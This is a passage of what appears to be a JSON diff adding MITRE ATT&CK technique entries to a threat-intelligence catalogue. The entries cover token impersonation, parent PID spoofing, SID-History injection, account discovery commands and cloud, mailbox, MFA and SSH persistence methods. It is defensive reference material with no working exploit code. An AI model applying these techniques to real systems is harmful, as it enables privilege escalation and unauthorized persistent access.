"uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ef0e0599-6543-499d-8409-ef449da5c38a", + "value": "Create Process with Token" + }, + { + "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) in that this refers to creating a new user token instead of stealing or duplicating an existing one.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1134.003" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "561da0ae-4ebc-4356-a954-338249cac31a", + "value": "Make and Impersonate Token" + }, + { + "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.[[DidierStevens SelectMyParent Nov 2009](https://app.tidalcyber.com/references/1fee31b0-2d9c-4c02-b494-d3a6b80f12f3)] This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.[[Microsoft UAC Nov 2018](https://app.tidalcyber.com/references/abda4184-18f9-4799-9c1f-3ba484473e35)]\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde)/[Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291).[[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)] This spoofing could be executed via [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) within a malicious Office document or any code that can perform [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560).[[CTD PPID Spoofing Macro Mar 2019](https://app.tidalcyber.com/references/b06b72ba-dbd6-4190-941a-0cdd3d659ab6)][[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.[[XPNSec PPID Nov 2017](https://app.tidalcyber.com/references/0dbf093e-4b54-4972-b048-2a6411037da4)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1134.004" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "449abc18-9faf-4ea6-a420-34528c28301d", + "value": "Parent PID Spoofing" + }, + { + "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. [[Microsoft SID](https://app.tidalcyber.com/references/c921c476-741e-4b49-8f94-752984adbba5)] An account can hold additional SIDs in the SID-History Active Directory attribute [[Microsoft SID-History Attribute](https://app.tidalcyber.com/references/32150673-5593-4a2c-9872-aaa96a21aa5c)], allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values [[Microsoft Well Known SIDs Jun 2017](https://app.tidalcyber.com/references/14b344ed-bde6-4755-b59a-595edb23a210)] may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1), [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd), or [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1134.005" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "dcb323f0-0fe6-4e26-9039-4f26f10cd3a5", + "value": "SID-History Injection" + }, + { + "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) is also distinct from [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) in that it refers to duplicating an existing token, rather than creating a new one.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1134.001" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ab823cbf-0238-4347-a191-a90d84b978f7", + "value": "Token Impersonation/Theft" + }, + { + "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7)) or used to spawn a new process (i.e. [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[[Pentestlab Token Manipulation](https://app.tidalcyber.com/references/243deb44-4d47-4c41-bd5d-262c4319cce5)]\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ef0e0599-6543-499d-8409-ef449da5c38a", + "type": "similar" + }, + { + "dest-uuid": "561da0ae-4ebc-4356-a954-338249cac31a", + "type": "similar" + }, + { + "dest-uuid": "449abc18-9faf-4ea6-a420-34528c28301d", + "type": "similar" + }, + { + "dest-uuid": "dcb323f0-0fe6-4e26-9039-4f26f10cd3a5", + "type": "similar" + }, + { + "dest-uuid": "ab823cbf-0238-4347-a191-a90d84b978f7", + "type": "similar" + } + ], + "uuid": "1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041", + "value": "Access Token Manipulation" + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to set malicious changes into place.[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)][[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]\n\nIn Windows, [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) objective. ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "847fcc8a-e74d-41e2-9f05-8d79d990cc04", + "value": "Account Access Removal" + }, + { + "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.[[Microsoft msolrolemember](https://app.tidalcyber.com/references/ca28494c-d834-4afc-9237-ab78dcfc427b)][[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)] The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)][[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)] \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.[[AWS List Roles](https://app.tidalcyber.com/references/42ff02f9-45d0-466b-a5fa-e19c8187b529)][[AWS List Users](https://app.tidalcyber.com/references/517e3d27-36da-4810-b256-3f47147b36e3)] In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.[[Google Cloud - IAM Servie Accounts List API](https://app.tidalcyber.com/references/3ffad706-1dac-41dd-b197-06f22fec3b30)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1087.004" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "d76c3dde-dba5-4748-8d51-c93fc34f885e", + "value": "Cloud Account" + }, + { + "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as net user /domain and net group /domain of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1087.002" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "12908bde-a5eb-40a5-ae27-d93960d0bfdc", + "value": "Domain Account" + }, + { + "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).[[Microsoft Exchange Address Lists](https://app.tidalcyber.com/references/138ec24a-4361-4ce0-b78e-508c11db397c)]\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.[[Microsoft getglobaladdresslist](https://app.tidalcyber.com/references/a4948a80-d11c-44ed-ae63-e3f5660463f9)][[Black Hills Attacking Exchange MailSniper, 2016](https://app.tidalcyber.com/references/adedfddc-29b7-4245-aa67-cc590acb7434)]\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.[[Google Workspace Global Access List](https://app.tidalcyber.com/references/5104f0ea-1fb6-4260-a9b6-95922b3a8e5b)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1087.003" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "b31b014b-0b59-4493-966b-a57ad68f073d", + "value": "Email Account" + }, + { + "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1087.001" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "df5f6835-ca0a-4ef5-bb3a-b011e4025545", + "value": "Local Account" + }, + { + "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + }, + { + "dest-uuid": "d76c3dde-dba5-4748-8d51-c93fc34f885e", + "type": "similar" + }, + { + "dest-uuid": "12908bde-a5eb-40a5-ae27-d93960d0bfdc", + "type": "similar" + }, + { + "dest-uuid": "b31b014b-0b59-4493-966b-a57ad68f073d", + "type": "similar" + }, + { + "dest-uuid": "df5f6835-ca0a-4ef5-bb3a-b011e4025545", + "type": "similar" + } + ], + "uuid": "6736995e-b9ea-401b-81fa-6caeb7a17ce3", + "value": "Account Discovery" + }, + { + "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)][[Blue Cloud of Death](https://app.tidalcyber.com/references/0c764280-9d8c-4fa4-9088-170f02550d4c)][[Blue Cloud of Death Video](https://app.tidalcyber.com/references/39b0adf6-c71e-4501-b8bb-fab82718486b)] These credentials include both x509 keys and passwords.[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)] With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.[[Demystifying Azure AD Service Principals](https://app.tidalcyber.com/references/3e285884-2191-4773-9243-74100ce177c8)]\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.[[GCP SSH Key Add](https://app.tidalcyber.com/references/372b6cfd-abdc-41b7-be78-4b1dc0426044)] This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)][[Expel Behind the Scenes](https://app.tidalcyber.com/references/d538026c-da30-48d2-bc30-fde3776db1a8)]\n\nAdversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e)).[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)][[Sysdig ScarletEel 2.0](https://app.tidalcyber.com/references/90e60242-82d8-5648-b7e4-def6fd508e16)] For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.[[SpecterOps Azure Privilege Escalation](https://app.tidalcyber.com/references/5dba5a6d-465e-4489-bc4d-299a891b62f6)] \n\nIn AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.\n[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1098.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "0799f2ee-3a83-452e-9fa9-83e91d83be25", + "value": "Additional Cloud Credentials" + }, + { + "description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.[[AWS IAM Policies and Permissions](https://app.tidalcyber.com/references/9bb520fa-0c4f-48aa-8b0a-8f1d42ee1d0c)][[Google Cloud IAM Policies](https://app.tidalcyber.com/references/b23a0df2-923d-4a5d-a40c-3ae218a0be94)][[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)][[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)] With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).[[Expel AWS Attacker](https://app.tidalcyber.com/references/089f6f4e-370c-49cb-a35c-c80be0fd39de)]\n[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)] \n\nThis account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.\n\nFor example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1098.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "71867386-ddc2-4cdb-a0c9-7c27172c23c1", + "value": "Additional Cloud Roles" + }, + { + "description": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.[[Kubernetes RBAC](https://app.tidalcyber.com/references/37c0e0e1-cc4d-5a93-b8a0-224f031b7324)][[Aquasec Kubernetes Attack 2023](https://app.tidalcyber.com/references/6d6e2fc8-9806-5480-bfaa-a43a962a4980)] Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.[[Kuberentes ABAC](https://app.tidalcyber.com/references/7f960599-a3d6-53bb-91ff-f0e6117a30ed)]\n \nThis account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised. \n\nNote that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.[[Google Cloud Kubernetes IAM](https://app.tidalcyber.com/references/e8ee3ac6-ae7c-5fd3-a339-b579a419dd96)][[AWS EKS IAM Roles for Service Accounts](https://app.tidalcyber.com/references/b2452f0e-93b0-55b7-add8-8338d171f0bf)][[Microsoft Azure Kubernetes Service Service Accounts](https://app.tidalcyber.com/references/bf374b41-b2a3-5c07-bf84-9ea0e1a9e6c5)] In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1098.006" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "1169afd3-d80d-5942-b16f-8dc1812ef6bb", + "value": "Additional Container Cluster Roles" + }, + { + "description": "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. \n\nFor example, the Add-MailboxPermission [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.[[Microsoft - Add-MailboxPermission](https://app.tidalcyber.com/references/b8d40efb-c78d-47dd-9d83-e5a31af73691)][[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)][[Crowdstrike Hiding in Plain Sight 2018](https://app.tidalcyber.com/references/8612fb31-5806-47ca-ba43-265a590b61fb)] In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.[[Gmail Delegation](https://app.tidalcyber.com/references/dfd28a01-56ba-4c0c-9742-d8b1db49df06)][[Google Ensuring Your Information is Safe](https://app.tidalcyber.com/references/ad3eda19-08eb-4d59-a2c9-3b5ed8302205)] \n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.[[Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452](https://app.tidalcyber.com/references/7aa5c294-df8e-4994-9b9e-69444d75ef37)]\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)), so the messages evade spam/phishing detection mechanisms.[[Bienstock, D. - Defending O365 - 2019](https://app.tidalcyber.com/references/4866e6c3-c1b2-4131-bd8f-0ac228168a10)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1098.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "15660958-1f4f-4136-8cda-82123fd38232", + "value": "Additional Email Delegate Permissions" + }, + { + "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)][[DarkReading FireEye SolarWinds](https://app.tidalcyber.com/references/a662c764-8954-493f-88e5-e022e093a785)] In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. [[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.[[AADInternals - Device Registration](https://app.tidalcyber.com/references/978b408d-f9e9-422c-b2d7-741f6cc298d4)][[AADInternals - Conditional Access Bypass](https://app.tidalcyber.com/references/832841a1-92d1-4fcc-90f7-afbabad84aec)][[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)] \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.[[Microsoft - Device Registration](https://app.tidalcyber.com/references/3f42fc18-2adc-46ef-ae0a-c2d530518435)] Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8) on an Azure AD tenant by registering a large number of devices.[[AADInternals - BPRT](https://app.tidalcyber.com/references/19af3fce-eb57-4e67-9678-1968e9ea9677)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1098.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "34ffaa47-f591-4a44-bd7d-9790d81365cd", + "value": "Device Registration" + }, + { + "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.[[SSH Authorized Keys](https://app.tidalcyber.com/references/ff100b76-894e-4d7c-9b8d-5f0eedcf59cc)] Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.[[Google Cloud Add Metadata](https://app.tidalcyber.com/references/eba4b850-8784-4da2-b87d-54b5bd0f58d6)][[Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/3dc4b69c-8cae-4489-8df2-5f55419fb3b1)] Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.[[Azure Update Virtual 